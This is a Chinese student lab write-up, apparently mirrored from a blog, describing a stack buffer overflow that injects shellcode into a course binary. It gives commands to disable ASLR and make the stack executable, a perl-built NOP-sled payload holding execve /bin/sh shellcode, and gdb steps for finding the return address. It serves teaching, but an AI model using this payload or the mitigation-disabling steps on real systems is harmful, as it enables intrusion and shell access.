zoukankan      html  css  js  c++  java
  • 注入Shellcode并运行攻击

    注入Shellcode并运行攻击#

    一、实验步骤##

    1.安装execstack并修改设置###

    • 安装execstack apt-get install execstack

    • 设置堆栈可执行 execstack -s 20154305

    • 查询文件的堆栈是否可执行 execstack -q 20154305

    • 关闭地址随机化echo "0" > /proc/sys/kernel/randomize_va_space

    • 查询地址随机化是否关闭more /proc/sys/kernel/randomize_va_space

    0代表关闭,2代表开启

    2. 构造攻击buf###

    本实验采用 retaddr+nop+shellcode 方法####

    • 由以上两阶段实验已经知道pwn1文件的foo函数字符串缓冲大小为32Byte

    • 采用老师提供的shellcode 的代码 x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00

    -用perl语言输入代码 perl -e 'print "A" x 32;print "x4x3x2x1x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode

    • 上面的x4x3x2x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。

    3. 确定返回地址的值###

    • 将写好的代码通过管道方式输入给程序20154305中的foo函数进行覆盖 (cat input_shellcode;cat) | ./20154305

    此处应注意,输入完指令只需要按一次回车,然后我们需要打开另一个终端

    • 打开另外一个终端,用gdb来调试pwn1这个进程

    • 首先找到20154305程序的进程号ps -ef | grep 20154305

    • 启动gdb调试这个程序 gdb attach 2041

    通过ps指令可以看到20154305程序有两个进程号:2041和2088,2041为上一个终端打开时的调用,故我们attach 2041进行调试

    • 设置断点来查看注入buf的内存地址disassemble foo

    ret的地址为 0x080484ae,ret完就会跳到我们覆盖的返回地址了

    • break *0x080484ae设置断点

    • 在另一个终端按下回车,这样程序就会执行之后在断点处停下来

    • 再在gdb调试的终端输入 c 继续运行程序

    • 通过info r esp查看esp寄存器的地址

    • 上图可以看到 01010304 所在的地址为 0xffffd3cc,那么注入的shellcode代码的地址应该在该地址后四个字节的位置,即0xffffd3cc + 0x00000004 = 0xffffd3d0

    • 退出gdp调试。

    4. 修改注入代码的覆盖地址

    输入
    perl -e 'print "A" x 32;print "xd0xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode

    (cat input_shellcode;cat) | ./20154305

    至此,已经能够成功运行我们注入的shell代码,实验成功。####

    二、实验总结##

    实验到此为止,已经通过三种方法对源程序pwn1进行攻击,直接修改指令是最容易也是最容易理解的,后两个方法都是通过缓冲区溢出覆盖返回地址达到跳转到目的代码的目的。利用了程序没有进行越界检查的漏铜,通过Bof攻击达到某些目的,可见程序的漏洞对我们的危害十分大,可能泄露我们电脑上的任何信息,因此我们要特别加强信息安全方面的防范。####

    方法三的实验环境是比较开放的,关闭了地址随机化等,难度大大降低,希望能够在以后的学习中学到更难的攻击方法,当然如老师所言,学习到思路和方法才是最重要的。####

  • 相关阅读:
    关于10月20日#8的六道题的心得与感悟
    关于10月19日#7的六道题的心得与感悟
    关于10月17日#6的五道数据结构题的心得与感悟
    关于10月16日模拟赛的心得与感悟
    关于10月15日#5的四道图论题的心得与感悟
    关于10月14日#4的四道图论题的心得与感悟
    关于跨进程通信AIDL的一些总结
    对App应用架构搭建的一些思考
    Java 实例化接口或抽象类
    使用ViewPager实现卡片叠加效果
  • 原文地址:https://www.cnblogs.com/qsss/p/8574681.html
Copyright © 2011-2022 走看看